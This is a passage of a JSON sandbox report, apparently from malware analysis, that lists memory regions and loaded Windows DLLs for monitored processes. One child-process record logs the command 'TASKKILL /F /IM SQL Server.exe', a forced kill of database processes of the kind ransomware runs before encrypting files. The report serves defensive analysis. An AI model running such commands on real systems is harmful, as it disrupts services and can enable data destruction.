"start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3885", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:30.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3886", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:30.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3887", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:30.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3888", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:30.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3889", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:30.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3890", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:30.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 6062079, "entry_point": 0, "filename": null, "id": "region_3891", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:01:30.838", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3892", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:30.838", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3893", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:30.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3894", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:30.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3895", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:30.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3896", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:30.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3897", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:30.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3898", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:30.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_3899", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:30.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 2162688, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3900", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:01:30.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_3901", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 8851455, "entry_point": 0, "filename": null, "id": "region_3902", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 30015487, "entry_point": 0, "filename": null, "id": "region_3903", "name": "pagefile_0x00000000008a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9043968, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31260671, "entry_point": 0, "filename": null, "id": "region_3904", "name": "private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 31522815, "entry_point": 0, "filename": null, "id": "region_3905", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3906", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3907", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:30.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_3908", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:30.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1784348672, "type": "region", "version": 1 }, "end_va": 1784725503, "entry_point": 1784490824, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3909", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1784348672, "timestamp": "00:01:30.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1785856000, "type": "region", "version": 1 }, "end_va": 1785896959, "entry_point": 1785861274, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3910", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1785856000, "timestamp": "00:01:30.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 32571391, "entry_point": 0, "filename": null, "id": "region_3911", "name": "private_0x0000000001e10000", "norm_filename": null, "region_type": "private_memory", "start_va": 31522816, "timestamp": "00:01:30.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_3912", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:30.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1784152064, "type": "region", "version": 1 }, "end_va": 1784319999, "entry_point": 1784179481, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3913", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1784152064, "timestamp": "00:01:30.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_3914", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:01:30.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_3915", "name": "private_0x0000000001f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 33095680, "timestamp": "00:01:30.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 36696063, "entry_point": 33751040, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3916", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33751040, "timestamp": "00:01:30.954", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3917", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:30.954", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3918", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:30.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3919", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:30.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3920", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:30.957", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_3921", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:31.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_3922", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:31.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30343168, "type": "region", "version": 1 }, "end_va": 30605311, "entry_point": 0, "filename": null, "id": "region_3923", "name": "private_0x0000000001cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30343168, "timestamp": "00:01:31.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_3924", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:01:31.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1785851903, "entry_point": 1785799072, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3925", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:31.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3926", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:31.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3927", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:31.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1783365632, "type": "region", "version": 1 }, "end_va": 1783463935, "entry_point": 1783370549, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3928", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1783365632, "timestamp": "00:01:31.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783496704, "type": "region", "version": 1 }, "end_va": 1784111103, "entry_point": 1783625913, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3929", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783496704, "timestamp": "00:01:31.023", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM SQL Server.exe /IM SQL Server.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_32", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 32, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3930", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:31.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3931", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:31.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3932", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:31.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3933", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:31.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3934", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:31.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_3935", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:31.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_3936", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:01:31.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 8216575, "entry_point": 8150153, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3937", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 8126464, "timestamp": "00:01:31.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3938", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:31.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3939", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3940", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3941", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3942", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3943", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3944", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3945", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:31.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, 